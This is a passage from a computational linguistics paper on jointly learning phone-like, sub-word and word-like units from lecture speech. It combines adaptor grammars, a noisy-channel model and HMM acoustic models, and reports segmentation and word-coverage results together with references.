operation is cho- sen for ui,j, the noisy-channel model will output two PLUs. 392 Sub-word-like and word-like unit learning With the standardized phone-like representation ui, higher-level linguistic structures can be inferred for each spoken utterance. We employ Adaptor Gram- mars (AGs) (Johnson et al., 2006) to achieve this goal, and use di to denote the parse tree that encodes the hierarchical linguistic structures in Fig. 1-(b)-(i). We bracket sub-word-like (e.g., syllable) and word- like units using [·] and (·), respectively. In summary, our model integrates adaptor gram- mars with a noisy-channel model of phonetic vari- ability and an acoustic model to discover hierarchi- cal linguistic structures directly from acoustic sig- nals. Even though we have discussed these sub-tasks in a bottom-up manner, our model provides a joint learning framework, allowing knowledge learned from one sub-task to drive discovery in the others. We now a review the formalization of adaptor gram- mars and define the noisy-channel and acoustic com- ponents of our model. We conclude this section by presenting the generative process implied by the three components of our model. 3.2 Adaptor Grammars Adaptor grammars are a non-parametric Bayesian extension of Probabilistic Context-Free Grammars (PCFGs). A PCFG can be defined as a quintu- ple (N,T,R,S,{~θq}q∈N), which consists of dis- joint finite sets of non-terminal symbols N and ter- minal symbols T , a finite set of production rules R ⊆ {N → (N ∪ T)∗}, a start symbol S ∈ N, and vectors of probabilistic distributions {~θq}q∈N . Each ~θq contains the probabilities associated with the rules that have the non-terminal q on their left- hand side. We use θr to indicate the probability of rule r ∈ R. We adopt a Bayesian approach and im- pose a Dirichlet prior on each ~θq ∼ Dir(~αq). Let t denote a complete derivation, which repre- sents either a tree that expands from a non-terminal q to its leaves, which contain only terminal symbols, or a tree that is composed of a single terminal sym- bol. We define root(t) as a function that returns the root node of t and denote the k immediate subtrees of the root node as t̂1, · · · , t̂k. The probability distri- bution over T q, the set of trees that have q ∈ N ∪T as the root, is recursively defined as follows. G q pcfg(t) = {∑ r∈Rq θr ∏k i=1 G root(t̂i) pcfg (t̂i) root(t) = q ∈ N 1 root(t) = q ∈ T An adaptor grammar is a sextuple (N,T,R,S,{~θq}q∈N,{Y q}q∈N), in which (N,T,R,S,{~θq}q∈N) is a PCFG, and {Y q}q∈N is a set of adaptors for the non-terminals. An adaptor Y q is a function that maps a base distribution over T q to a distribution over distributions over T q. The distribution Gqag(t) for q ∈ N of an AG is a sample from this distribution over distributions. Specifically, Gqag(t) ∼ Y q(Hq(t)) Hq(t) = ∑ r∈Rq θr ∏k i=1 Groot(t̂i)ag (t̂i), where Hq(t) denotes the base distribution over T q. In this paper, following Johnson et al. (2006), we use adaptors that are based on Pitman-Yor pro- cesses (Pitman and Yor, 1997). For terminal sym- bols q ∈ T , we define Gqag(t) = 1, which is a distribution that puts all its probability mass on the single-node tree labelled q. Conceptually, AGs can be regarded as PCFGs with memories that cache the complete derivations of adapted non-terminals, al- lowing the AG to choose to either reuse the cached trees or select a production an underlying rule in R to expand each non-terminal. For a more detailed description of AGs and their connection to PCFGs, we refer readers to Johnson et al. (2006) and Chapter 3 of O’Donnell (2015). To discover the latent hierarchical linguistic struc- tures in spoken utterances, we employ the following AG to parse each spoken utterance, where we adopt the notations of Johnson and Goldwater (2009b) and use underlines to indicate adapted non-terminals and employ + to abbreviate right-branching recursive rules for non-terminals. The last rule shows that the terminals of this AG are the PLU ids, which are represented as ui and depicted as the units in the squares of Fig. 1-(b)-(ii). Sentence → Word+ Word → Sub-word+ Sub-word → Phone+ Phone → l for l ∈ L Note that the grammar above only makes use of right-branching rules and therefore could be sim- ulated using finite-state infrastructure, rather than the more complex context-free machinery implicit in the adaptor grammars framework. We nevertheless 393 make use of the formalism for two reasons. First, on a theoretical level it provides a uniform framework for expressing many different assumptions about the symbolic component of segmentation models (Gold- water et al., 2009; Johnson, 2008b; Börschinger and Johnson, 2014; Johnson, 2008a; Johnson and Gold- water, 2009b; Johnson and Demuth, 2010). Using adaptor grammars to formalize the symbolic compo- nent our our model thus allows direct comparisons to this literature as well as transparent extensions fol- lowing earlier work. Second, on a practical level, us- ing the framework allowed us to make use of Mark Johnson’s efficient implementation of the core adap- tor grammar sampling loop, significantly reducing model development time. 3.3 Noisy-channel Model We formulate the noisy-channel model as a PCFG and encode the substitute, split, and delete opera- tions as grammar rules. In particular, for l ∈ L, l → l′ for l′ ∈ L l → 1′1l′2 for l′1, l′2 ∈ L l → � (1) where l ∈ L are the start symbols as well as the non- terminals of the PCFG. The terminals of this PCFG are l′ ∈ L, which correspond to bottom-layer PLUs ~vi that are depicted as units in circles in Fig. 1- (b)-(iv). Note that {l} and {l′} are drawn from the same inventory of PLUs, and the notation is meant to signal that {l′} are the terminal symbols of this grammar. The three sets of rules respectively map to the sub(·), split(·), and del(·) operations; thus, the probability of each edit operation is automatically captured by the corresponding rule probability. Note that to simultaneously infer a phonetic inventory of an unknown size and model phonetic variation, we can use the infinite PCFG (Liang et al., 2007) to formulate the noisy-channel model. However, for computational efficiency, in our experiments, we in- fer the size of the PLU inventory before training the full model, and impose a Dirichlet prior on the rule probability distribution associated with each non- terminal l. We explain how inventory size is deter- mined in Sec. 5.2. 3.4 Acoustic Model Finally, we assign each discovered PLU l ∈ L to an HMM, πl, which is used to model the speech re- alization of each phonetic unit in the feature space. In particular, to capture the temporal dynamics of the features associated with a PLU, each HMM con- tains three emission states, which roughly corre- spond to the beginning, middle, and end of a pho- netic unit (Jelinek, 1976). We model the emission distribution of each state by using 39-dimensional diagonal Gaussian Mixture Models (GMMs). The prior distributions embedded in the HMMs are the same as those described in (Lee and Glass, 2012). 3.5 Generative Process of the Proposed Model With the adaptor grammar, the noisy-channel model, and the acoustic model defined, we summarize the generative process implied by our model as follows. For the ith utterance in the corpus, our model 1. Generates a parse tree di from GSentenceag (·). 2. For each leaf node ui,j of di, samples an edit rule oi,j from ~θui,j to convert ui,j to vi,j. 3. For vi,j,k ∈ vi,j, 1 ≤ k ≤ |vi,j|, generates the speech features using πvi,j,k, which determinis- tically sets the value of zi,t. Thus, the latent variables our model defines for each utterance are: di, ui, oi, ~vi, zi, π, {~θq}q∈Nag∪Nnoisy-channel . In the next section, we de- rive inference methods for all the latent variables except for {~θq}q∈Nag∪Nnoisy-channel , which we integrate out during the inference process. 4 Inference We exploit Markov chain Monte Carlo algorithms to generate samples from the posterior distribution over the latent variables. In particular, we construct three Markov chain kernels: 1) jointly sampling di, oi, ui, 2) generating new samples for ~vi, zi, and 3) updating π. Here, we give an overview of each of the sampling moves. 4.1 Sampling di, oi, and implicitly ui We employ the Metropolis-Hastings (MH) algo- rithm (Chib and Greenberg, 1995) to generate sam- ples for di and oi, which implicitly determines ui. 394 Given d−i,o−i, the current parses and the current edit operations associated with all the sentences in the corpus except the ith utterance, we can con- struct a proposal distribution for d′i and o ′ i 2 by using the approximating PCFG described in Johnson et al. (2006) and the approximated probability of o′i,j in o′i, which is defined in Eq. 2. p(o′i,j|o−i;{~α}q) ≈ C−i(u ′ i,j → v′i,j) + ~α u′i,j u′i,j→v′i,j C−i(u′i,j) + ∑ r∈Ru ′ i,j ~α u′i,j r (2) where q ∈ Nnoisy-channel, and C−i(w) denotes the number of times that w is used in the analyses for the corpus, excluding the ith utterance, in which w can be any countable entity such as a rule or a symbol. More specifically, we combine the PCFG that approximates the adaptor grammar with the noisy- channel PCFG whose rules are weighted as in Eq. 2 to form a new PCFG G′. The new PCFG G′ is thus a grammar that can be used to parse the terminals ~vi and generate derivations that are rooted at the start symbol of the AG. Therefore, we transform the task of sampling d′i and o ′ i to the task of generat- ing a parse for ~vi using G′, which can be efficiently solved by using an variant of the Inside algorithm for PCFGs (Lari and Young, 1990; Johnson et al., 2007; Goodman, 1998; Finkel et al., 2006). 4.2 Sampling ~vi and zi Given the top-layer PLUs ui and the speech data xi, sampling the boundary variables zi and the bottom- layer PLUs ~vi is equivalent to sampling an align- ment between ui and xi. Therefore, we use the probabilities defined in Eq. 2 and employ the back- ward message-passing and forward-sampling algo- rithm described in Lee et al. (2013), designed for aligning a letter sequence and speech signals, to pro- pose samples for ~vi and zi. The proposals are then accepted by using the standard MH criterion. 4.3 Sampling π Given zi and ~vi of each utterance in the corpus, generating new samples for the parameters of each HMM πl for l ∈ L is straightforward. For each PLU l, we gather all speech segments that are mapped to 2We use di and d′i to denote the current and the proposed parses. The same relationship is also defined for oi and o′i. Lecture topic Duration Economics 75 mins Speech processing 85 mins Clustering 78 mins Speaker adaptation 74 mins Physics 51 mins Linear algebra 47 mins Table 1: A brief summary of the six lectures used for the experiments reported in Section 6. a bottom-layer PLU vi,j,k = l. For every segment in this set, we use πl to block-sample the state id and the GMM mixture id for each feature vector. From the state and mixture assignments, we can collect the counts that are needed to update the priors for the transition probability and the emission distribution of each state in πl. New samples for the parameters of πl can thus be yielded from the updated priors. 5 Experimental Setup 5.1 Dataset To the best of our knowledge, there are no standard corpora for evaluating models of unsupervised lex- icon discovery. In this paper, we perform experi- ments on the six lecture recordings used in (Park and Glass, 2008; Zhang and Glass, 2009), a part of the MIT Lecture corpus (Glass et al., 2004). A brief summary of the six lectures is listed in Table 1. 5.2 Systems Full system We constructed two systems based on the model described in Sec. 3. These systems, FullDP and Full50, differ only in the size of the PLU inventory (K). For FullDP, we set the value of K to be the number of PLUs discovered for each lec- ture by the DPHMM framework presented in (Lee and Glass, 2012). These numbers were: Economics, 99; Speech Processing, 111; Clustering, 91; Speaker Adaptation, 83; Physics, 90; and Algebra, 79. For Full50, we used a fixed number of PLUs, K = 50. The acoustic component of the FullDP system was initialized by using the output of the DPHMM model for each lecture. Specifically, we made use of the HMMs, the phone boundaries, and the PLU that the DPHMM model found as the initial values for π, zi, and ~vi of the FullDP system. After initializa- tion, the training of FullDP proceeds by following 395 the three sampling moves described in Sec. 4. Sim- ilarly, we employ a Hierarchical HMM (HHMM), which is presented in detail in (Lake et al., 2014), to find the initial values of π, zi, and ~vi for the Full50 system. The adaptor grammar component of all sys- tems was initialized following the “batch initializa- tion” method described in Johnson and Goldwater (2009b) which independently samples an AG analy- sis for each utterance. The lesioned systems that are described in the rest of this section were also initial- ized in the same manner. To reduce the inference load on the HMM, we ex- ploit acoustic cues in the feature space to constrain phonetic boundaries to occur at a subset of all pos- sible locations (Lee and Glass, 2012). We follow the pre-segmentation method described in (Glass, 2003) to achieve the goal. Empirically, this bound- ary elimination heuristic reduces the computational complexity of the inference algorithm by roughly an order of magnitude on clean speech corpora. No acoustic model We remove the acoustic model from FullDP and Full50 to obtain the -AM sys- tems. Since the -AM systems do not have an acous- tic model, they cannot resegment or relabel the data, which implies that there is no learning of phonetic units in the -AM systems, making them similar to symbolic segmentation models that include a noisy channel component (Elsner et al., 2013). By com- paring a -AM system to its full counterpart, we can investigate the synergies between phonetic and lexi- cal unit acquisition in the full model. No noisy-channel To evaluate the importance of modeling phonetic variability, we remove the noisy- channel model from the -AM systems to form - NC systems. A -NC system can be regarded as a pipeline, whereby utterance phone sequences are discovered first, and latent higher-level linguistic structures are learned in the second step and thus is similar to models such as that of Jansen et al. (2010). 6 Results and Analyses Training convergence Fig. 2 shows the negative log posterior probability of the sampled parses d and edit operations o for each lecture as a function of iteration generated by the FullDP system. Given that each lecture consists of roughly only one hour 0 50 100 150 200 0.5 1 1.5 2 2.5 3 3.5 4 x 10 5 iterations − lo g P (d ,o |x ) Economics Speech processing Clustering Speaker adaptation Physics Algebra Figure 2: The negative log posterior probability of the latent variables d and o as a function of iteration obtained by the FullDP model for each lecture. of speech data, we can see that the model converges fairly quickly within a couple hundreds of iterations. In the this section, we report the performance of each system using the corresponding sample from the 200th iteration. Phoneme segmentation We first evaluate our model on the task of phone segmentation for the six lectures. We use a speech recognizer to produce phone forced alignments for each lecture. The phone segmentation embedded in the forced alignments is then treated as the gold standard to which we com- pare the segmentation our model generates. We fol- low the suggestion of (Scharenborg et al., 2010) and use a 20-ms tolerance window to compute the F1 score of all proposed phone segmentations. Table 2 presents the F1 scores achieved by dif- ferent systems. Because the -AM and -NC systems do not do inference over acoustic segmentations, we compare the phoneme-segmentation performance of each full system to its performance at initialization. Recall that the Full50 system is initialized using the output of a Hierarchical HMM (HHMM), and the FullDP system is initialized using DPHMM. From Table 2 we can see that the two -AM sys- tems achieve roughly the same segmentation perfor- mance for the first four lectures. Aside from using the boundary elimination method described in (Lee and Glass, 2012), these two systems are trained in- dependently. The table shows that the two initializa- tion systems achieve roughly the same segmentation 396 Lecture topic Full50 HHMM FullDP DPHMM Economics 74.4 74.6 74.6 75.0 Signal processing 76.2 76.0 76.0 76.3 Clustering 76.6 76.6 77.0 76.9 Speaker adaptation 76.5 76.9 76.7 76.9 Physics 75.9 74.9 75.7 75.8 Linear algebra 75.5 73.8 75.5 75.7 Table 2: The F1 scores for the phone segmentation task obtained by the full systems and their corresponding initialization systems. Lecture topic Full50 -AM -NC FullDP -AM -NC Economics 15.4 15.4 14.5 16.1 14.9 13.8 Signal processing 17.5 16.4 12.1 18.3 17.0 14.5 Clustering 16.7 18.1 15.9 18.4 16.9 15.2 Speaker adaptation 17.3 17.4 15.4 18.7 17.6 16.2 Physics 17.7 17.9 15.6 20.0 18.0 15.2 Linear algebra 17.9 17.5 15.4 20.0 17.0 15.6 Table 3: F1 scores for word segmentation obtained by the full systems and their ablated systems. performance for the first four lectures. Thus, their narrow performance gap indicates that the two ini- tialization systems may have already found a near- optimal segmentation. Since our model also looks for the best segmenta- tion in the same hypothesis space, by initializing the boundary variables around the optimum, our model should simply maintain the segmentation. In par- ticular, as shown in Table 2, the full systems also achieve about the same performance as the -AM systems for the first four lectures, with the overall largest performance difference being 0.4%. It is perhaps more interesting when the initializa- tion system gets stuck at a local optimum. By com- paring the performance of the two -AM systems for the last two lectures, we can see that the initial- ization of Full50 converges to local optimums for the two lectures. Nonetheless, as shown in Table 2, the Full50 system is able to improve the given ini- tial segmentation and reach a similar performance to that accomplished by the FullDP and the initial- ization of the FullDP systems. Word segmentation In addition to phone segmen- tation, we also evaluate our model on the task of word segmentation. Similar to how we generate the gold standard segmentation for the previous task, we use a speech recognizer to produce word alignments and obtain the word segmentation for each lecture. We then compare the word segmentation that our systems generate to the gold standard and calculate the F1 scores by using a 20-ms tolerance window. By comparing the full systems to their -NC coun- terparts, we can see that the noisy-channel model plays an important role for word segmentation, which resonates with the findings of in (Elsner et al., 2013). Without the capability of modeling phonetic variability, it is difficult, or even impossible, for the -NC systems to recognize word tokens of the same type but with different phonetic realizations. We can also observe the advantage of joint learn- ing both word-level and phone-level representations by comparing the FullDP system to the correspond- ing -AM model. On average, the FullDP system out- performs its -AM ablated counterpart by 1.6% on the word segmentation task, which indicates that the top-down word-level information can help refine the phone-level knowledge that the model has learned. While similar improvements are only observed in two lectures for the Full50 and its -AM version, we believe it’s because the Full50 system does not have as much flexibility to infer the phonetic embeddings as the FullDP system. This inflexibility may have 397 Lecture topic Full50 -AM -NC FullDP -AM -NC P&G Zhang 2008 2013 Economics 12 4 2 12 9 6 11 14 Signal processing 16 16 5 20 19 14 15 19 Clustering 18 17 9 17 18 13 16 17 Speaker adaptation 14 14 8 19 17 13 13 19 Physics 20 14 12 20 18 16 17 18 Linear algebra 18 16 11 19 17 7 17 16 Table 4: The number of the 20 target words discovered by each system described in Sec. 5, and by the baseline (Park and Glass, 2008), and state-of-the-art system (Zhang, 2013). The best performance achieved for each lecture is shown in bold. prevented the Full50 system to fully exploit the top- down information for learning. Finally, note that even though the F1 scores for the word segmentation task are low, we find simi- lar performance reported in Jansen et al. (2013). We would like to raise the question of whether the con- ventional word segmentation task is a proper eval- uation method for an unsupervised model such as the one described in this paper. Our thought is two fold. First, correct segmentation is vaguely de- fined. By choosing different tolerance windows, dif- ferent segmentation performance is obtained. Sec- ond, as we show later, many of the units discov- ered by our model are linguistically meaningful, al- though they do not always strictly correspond to words (i.e., the units may be morphemes or collo- cations, etc.). Since these are linguistically mean- ingful units which should be identified by an unsu- pervised lexical discovery model, it is not clear what advantage would be gained by privileging words in the evaluation. Nevertheless, we present the word segmentation performance achieved by our model in this paper for future references. Coverage of words with high TFIDF scores To assess the performance of our model, we evaluate the degree to which it was able to correctly recover the vocabulary used in input corpora. To facilitate comparison with the baseline (Park and Glass, 2008) and state-of-the-art (Zhang, 2013) spoken term dis- covery systems, we restrict attention to the top 20 highest TFIDF scoring words for each lecture. Note that the set of target words of each lecture were orig- inally chosen in (Park and Glass, 2008) and used as the evaluation set in both Park and Glass (2008) and Zhang (2013). To compare our system directly to previous work, we use the same set of target words to test our model.3 Table 4 summarizes the coverage achieved by each variant of our model as well as the two spo- ken term discovery systems. Note that these two systems differ only in the acoustic features used to represent the input: MFCC features versus more ro- bust Gaussian posteriorgrams, respectively. Both the FullDP and Full50 systems consistently outperform the baseline. Both systems also exceed or perform as well as the state-of-the-art system on most lectures. Furthermore, they do so using the less robust MFCC feature-based acoustic representation. The results in Table 4 also illustrate the syner- gistic interactions that occur between the acoustic and symbolic model components. As described in Sec. 5, the -AM systems are identical to the full systems, except they do not include the acoustic model, and, therefore, do not re-segment or relabel the speech after initialization. As Table 4 shows, the Full50 and FullDP models both tend to have coverage which is as good as, or better than, the corresponding models without an acoustic compo- nent. This indicates that top-down pressure from the symbolic component can refine bottom-layer PLUs, leading, ultimately, to better lexicon discovery. Finally, the comparison between Full/-AM mod- els and their -NC components suggests the impor- tance of modeling variability in the realization of phonemes. As we will discuss in the next section, the full model tends to merge multiple sequences of 3For the procedure used to identify the word label for each lexical unit, we refer the reader to Sec. 3.5.3 of (Lee, 2014) for detailed explanation. 398 Figure 3: The bottom-layer PLUs ~v and the top-layer PLUs u as well as the word-internal structure that the FullDP system discovered for three instances of the words (a) globalization and (b) collaboration. We also include phoneme transcriptions (derived by manual inspection of spectrograms), for clarity. bottom-layer PLUs into single lexical items which share a single top-layer PLU sequence. The results in Table 4 confirm this: When the model does not have the option of collapsing bottom-layer PLU se- quences, word discovery degrades considerably. Examples and qualitative analyses To provide intuition about the model behavior, we present sev- eral examples and qualitative analyses. Figure 3 illustrates the model’s representation of two words which appeared frequently in the economics lecture: globalization and collaboration. The figure shows (i) the bottom-layer PLUs which the model assigned to three instances of each word in the training cor- pus, (ii) the alignments between these bottom-layer PLUs and the top-layer PLU sequence correspond- ing the model’s lexical representation of each word, (iii) the decomposition of each word-like unit into sub-word-like units, which are denoted as bracketed sequences of PLUs (e.g., [70 110 3]), and (iv) a hand annotated phonemic transcription. The first thing to note is the importance of the noisy-channel component in normalizing variation across word tokens. In Figure 3-(a) the model has in- ferred a different sequence of bottom-layer PLUs for each spoken instance of globalization. PLUs which vary between the three instances are highlighted in red. The model was able to map these units to the single sequence of top-layer PLUs associated with the lexical item. Similar remarks hold for the word collaboration in Figure 3-(b). This suggests that acoustic variability between segments led the model to infer different bottom-layer PLUs between word tokens, but this variability was correctly normalized by the noisy-channel component. The second thing to note is the large amount of variability in the granularity of stored sub-word-like units (bracketed PLU sequences). The model allows sub-word-like units to consist of any sequence of PLUs, without further constraint. Figure 3 shows that the model makes use of the flexibility, repre- senting linguistic structure at a variety of different scales. For example, the initial sub-word-like unit of collaboration groups together two PLUs corre- sponding to a single phoneme /k/. Other sub-word- like units correspond to syllables. Still others cap- ture morphological structure. For example, the fi- nal sub-word-like unit in both words (highlighted in green) corresponds to the combination of suf- fixes -ation—a highly productive unit in English (O’Donnell, 2015).4 4The reader may notice that the lexical representations are missing a final /n/ phoneme. Manual examination of spectro- 399 Transcription Discovered lexical units |Word| /iy l iy/ (really, willy, billion) [35] [31 4] 68 /ey sh ax n/ (innovation, imagination) [6 7 30] [49] 43 /ax bcl ax l/ (able, cable, incredible) [34 18] [38 91] 18 discovered [26] [70 110 3] [9 99] [31] 9 individual [49 146] [34 99] [154] [54 7] [35 48] 7 powerful [50 57 145] [145] [81 39 38] 5 open university [48 91] [4 67] [25 8 99 29] [44 22] [103 4] 4 the arab muslim world [28 32] [41] [67] [25 35] [1 27] [13 173] [8 139] [38 91] 2 Table 5: A subset of the lexical units that the FullDP system discovers for the economics lecture. The number of independent speech segments that are associated with each lexical unit is denoted as |Word|. Lexical units also exhibit variability in granular- ity. Table 5 shows a subset of lexical units discov- ered by the FullDP system for the economics lecture. Each entry in the table shows (i) the decomposition of each word-like unit into sub-word-like units, (ii) a phonemic transcription of the unit, and (iii) the num- ber of times each lexical unit was used to label a seg- ment of speech in the lecture (denoted as |Word|). The lexical units displayed in the table correspond, for the most part, to linguistic units. While there are a few cases, such as /iy l iy/, where the model stored a sequence of phones which does not map directly onto a linguistic unit such as a syllable, morpheme, or word, most stored units do correspond to intu- itively plausible linguistic constituents. However, like sub-word-like units, there is vari- ability in the scale of the linguistic structure which they capture. On one hand, the model stores a number of highly reusable smaller-than-word units, which typically correspond to morphemes or highly frequent syllables. For example, the sequences /ax bcl ax l/ and /ey sh ax n/ correspond to the pro- ductive suffix -able and suffix combination -ation (O’Donnell, 2015). On the other hand, the model also stores lexical units which correspond to words (e.g., powerful) and multi-word collocations (e.g., the arab muslim world). Figure 4 shows an analy- sis of stored lexical units for each lecture, plotting grams revealed two likely reasons for this. First, the final PLU 30 is likely to be a nasalized variant of /@/, thus encoding some portion of the following /n/ phoneme. Second, across these word instances there is a great deal of acoustic variation be- tween the acoustic realizations of the consonant /n/. It is un- clear at present whether this variation is systematic (e.g., co- articulation with the following word), or simply noise. 14.3% 9.4% 34.0% 33.8% 42.9% 42.4% 35.1%32.6% 19.9% 19% 14.8% 22.8% 46.1% 53.1% 45.9% 48.2%42.3% 43.4% Economics Signal processing Clustering Speaker adaptation Physics Linear algebra multi-word single word sub-word Figure 4: The proportions of the word tokens the FullDP system generates for each lecture that map to sub-words, single words, and multi-words. the proportion of stored items which map onto sub- words, words, and multi-word collocations for each. Why does the model choose to store some units and not others? Like many approaches to lexi- con learning (Goldwater, 2006; De Marcken, 1996c; Johnson et al., 2006), our model can be understood as balancing a tradeoff between productivity (i.e., computation) and reuse (i.e., storage). The model attempts to find a set of lexical units which explain the distribution of forms in the input, subject to two opposing simplicity biases. The first favors smaller numbers of stored units. The second favors deriva- tions of observed utterances which use fewer com- putational steps (i.e., using small number of lexical items). These are opposing biases. Storing larger lexical units, like the arab muslim world, leads to simpler derivations of individual utterances, but a larger lexicon. Storing smaller lexical units, like the suffix -able, leads to a more compact lexicon, but more complex derivations individual utterances. 400 Smaller units are favored when they are used across a large variety of relatively infrequent con- texts. For example, -ation appears in a large number of input utterances, but often as part of words which themselves are relatively infrequent (e.g., conversa- tion, reservation, innovation, and foundation which appear 2, 3, 4, and 2 times respectively). Larger units will be favored when a combination of smaller units appears more frequently than would be pre- dicted by considering their probabilities in isolation. For example, the model stores the words globaliza- tion and collaboration in their entirety, despite also storing the suffix combination -ation. These words occur 25 and 21 times respectively in the lecture, which is a greater number of times than would be expected merely by considering the words sub-parts. Thus, the fact that the model stores a variety of lexi- cal units at different granularities is expected. 7 Conclusion and Future Work In this paper, we have presented a probabilistic framework for inferring hierarchical linguistic struc- tures from acoustic signals. Our approach is for- mulated as an integration of adaptor grammars, a noisy-channel model, and an acoustic model. Com- parison of the model with lesioned counterparts sug- gested that our model takes advantage of synergis- tic interactions between phonetic and lexical repre- sentations. The experimental results also indicate that modeling phonetic variability may play a crit- ical role in inferring lexical units from speech. While the noisy-channel model has demonstrated an ability to normalize phonetic variations, it has its limitations. In the future, we plan to investi- gate alternatives that more accurately capture pho- netic variation. We also plan to explore grammars that encode other types of linguistic structures such as collocation of lexical and morphological units. Acknowledgements The authors would like to thank the anonymous re- viewers and the action editor of this paper, Eric Fosler-Lussier, for helpful comments. Furthermore, the authors would also like to thank Mark Johnson for making his implementation of adaptor grammars publicly available and for answering detailed ques- tions about the model and his implementation. References Guillaume Aimetti. 2009. Modelling early language ac- quisition skills: Towards a general statistical learning mechanism. In Proceedings of EACL: Student Re- search Workshop, pages 1–9. Shlomo Argamon, Navot Akiva, Amihood Amir, and Oren Kapah. 2004. Efficient unsupervised recursive word segmentation using minimum description length. In Proceedings of the 20th international conference on Computational Linguistics. M Bacchiani and M Ostendorf. 1999. Joint lexicon, acoustic unit inventory and model design. Speech Communication, 29(24):99 – 114. Benjamin Börschinger and Mark Johnson. 2014. Explor- ing the role of stress in Bayesian word segmentation using adaptor grammars. Transactions of ACL, 2:93 – 104. Michael R. Brent. 1999a. An efficient, probabilistically sound algorithm for segmentation and word discovery. Machine Learning, 34:71–105. Michael R. Brent. 1999b. Speech segmentation and word discovery: A computational perspective. Trends in Cognitive Sciences, 3(8):294–301, August. Timothy A. Cartwright and Michael R. Brent. 1994. Segmenting speech without a lexicon: Evidence for a bootstrapping model of lexical acquisition. In Pro- ceedings of the 16th Annual Meeting of the Cognitive Science Society. Siddhartha Chib and Edward Greenberg. 1995. Un- derstanding the Metropolis-Hastings algorithm. The American Statistician, 49(4):327–335. Cheng-Tao Chung, Chun-an Chan, and Lin-shan Lee. 2013. Unsupervised discovery of linguistic structure including two-level acoustic patterns using three cas- caded stages of iterative optimization. In Proceedings of ICASSP, pages 8081–8085. Mathias Creutz and Krista Lagus. 2007. Unsupervised models for morpheme segmentation and morphology learning. ACM Transactions on Speech and Language Processing, 4(1). Steven B. Davis and Paul Mermelstein. 1980. Com- parison of parametric representations for monosyllabic word recognition in continuously spoken sentences. IEEE Transactions on Acoustics, Speech, and Signal Processing, 28(4):357–366. Carl De Marcken. 1996a. Linguistic structure as com- position and perturbation. In Proceedings of the 34th annual meeting on Association for Computational Lin- guistics, pages 335–341. Association for Computa- tional Linguistics. Carl De Marcken. 1996b. The unsupervised acquisition of a lexicon from continuous speech. Technical Report 401 AI-memo-1558, CBCL-memo-129, Massachusetts In- stitute of Technology Artificial Intelligence Labora- tory. Carl De Marcken. 1996c. Unsupervised Language Ac- quisition. Ph.D. thesis, Massachusetts Institute of Technology. Micha Elsner, Sharon Goldwater, Naomi Feldman, and Frank Wood. 2013. A joint learning model of word segmentation, lexical acquisition, and phonetic vari- ability. In Proceedings of EMNLP, pages 42–54. T.S. Ferguson. 1973. A Bayesian analysis of some non- parametric problems. Ann. Statist, 1(2):209–230. Jenny Rose Finkel, Christopher D. Manning, and An- drew Y. Ng. 2006. Solving the problem of cascading errors: Approximate Bayesian inference for linguistic annotation pipelines. In Proceedings of the Confer- ence on Empirical Methods in Natural Language Pro- cessing (EMNLP), pages 618–626. Michael C. Frank, Sharon Goldwater, Thomas L. Grif- fiths, and Joshua B. Tenenbaum. 2010. Modeling human performance in statistical word segmentation. Cognition, 117(2):107–125. Michael C. Frank, Joshua B. Tenenbaum, and Edward Gibson. 2013. Learning and long-term retention of large-scale artificial languages. Public Library of Sci- ence (PloS) ONE, 8(4). James Glass, Timothy J. Hazen, Lee Hetherington, and Chao Wang. 2004. Analysis and processing of lecture audio data: Preliminary investigations. In Proceedings of the Workshop on Interdisciplinary Approaches to Speech Indexing and Retrieval at HLT-NAACL, pages 9–12. James Glass. 2003. A probabilistic framework for segment-based speech recognition. Computer Speech and Language, 17:137 – 152. John Goldsmith. 2001. Unsupervised learning of the morphology of natural language. Computational Lin- guistics, 27(2):153–198. John Goldsmith. 2006. An algorithm for the unsuper- vised learning of morphology. Natural Language En- gineering, 12(4):353–371. Sharon Goldwater, Thomas L. Griffiths, and Mark John- son. 2009. A Bayesian framework for word segmen- tation: Exploring the effects of context. Cognition, 112:21–54. Sharon Goldwater. 2006. Nonparametric Bayesian Mod- els of Lexical Acquisition. Ph.D. thesis, Brown Uni- versity. Joshua T. Goodman. 1998. Parsing Inside-Out. Ph.D. thesis, Harvard University. Zellig Harris. 1955. From phoneme to morpheme. Lan- guage, 31(2):190–222. Jahn Heymann, Oliver Walter, Reinhold Haeb-Umbach, and Bhiksha Raj. 2013. Unsupervised word seg- mentation from noisy input. In Proceedings of ASRU, pages 458–463. IEEE. Aren Jansen, Kenneth Church, and Hynek Hermansky. 2010. Towards spoken term discovery at scale with zero resources. In Proceedings of INTERSPEECH, pages 1676–1679. Aren Jansen, Emmanuel Dupoux, Sharon Goldwater, Mark Johnson, Sanjeev Khudanpur, Kenneth Church, Naomi Feldman, Hynek Hermansky, Florian Metze, Richard C. Rose, et al. 2013. A summary of the 2012 JHU CLSP workshop on zero resource speech tech- nologies and models of early language acquisition. In ICASSP, pages 8111–8115. Frederick Jelinek. 1976. Continuous speech recogni- tion by statistical methods. Proceedings of the IEEE, 64:532 – 556. Mark Johnson and Katherine Demuth. 2010. Unsu- pervised phonemic Chinese word segmentation using adaptor grammars. In Proceedings of COLING, pages 528–536, August. Mark Johnson and Sharon Goldwater. 2009a. Improving nonparameteric Bayesian inference: Experiments on unsupervised word segmentation with Adaptor Gram- mars. In Human Language Technologies: The 2009 Annual Conference of the North American Chapter of the ACL, pages 317–325. Mark Johnson and Sharon Goldwater. 2009b. Improving nonparameteric Bayesian inference: experiments on unsupervised word segmentation with adaptor gram- mars. In Proceedings of NAACL-HLT, pages 317–325. Mark Johnson, Thomas L. Griffiths, and Sharon Goldwa- ter. 2006. Adaptor grammars: A framework for speci- fying compositional nonparametric Bayesian models. In Advances in Neural Information Processing Sys- tems, pages 641–648. Mark Johnson, Thomas L. Griffiths, and Sharon Goldwa- ter. 2007. Bayesian inference for PCFGs via Markov chain Monte Carlo. In Proceedings of NAACL, pages 139–146. Mark Johnson. 2008a. Unsupervised word segmentation for Sesotho using adaptor grammars. In Proceedings of the Tenth Meeting of ACL Special Interest Group on Computational Morphology and Phonology, pages 20–27, Columbus, Ohio, June. Mark Johnson. 2008b. Using adaptor grammars to iden- tify synergies in the unsupervised acquisition of lin- guistic structure. In Proceedings of ACL, pages 398– 406. Brenden M. Lake, Chia-ying Lee, James R. Glass, and Joshua B. Tenenbaum. 2014. One-shot learning of generative speech concepts. In Proceedings of the 36th Annual Meeting of the Cognitive Science Soceity. 402 Karim Lari and Steve J. Young. 1990. The estimation of stochastic context-free grammars using the inside- outside algorithm. Computer speech & language, 4(1):35–56. Chia-ying Lee and James Glass. 2012. A nonparamet- ric Bayesian approach to acoustic model discovery. In Proceedings of 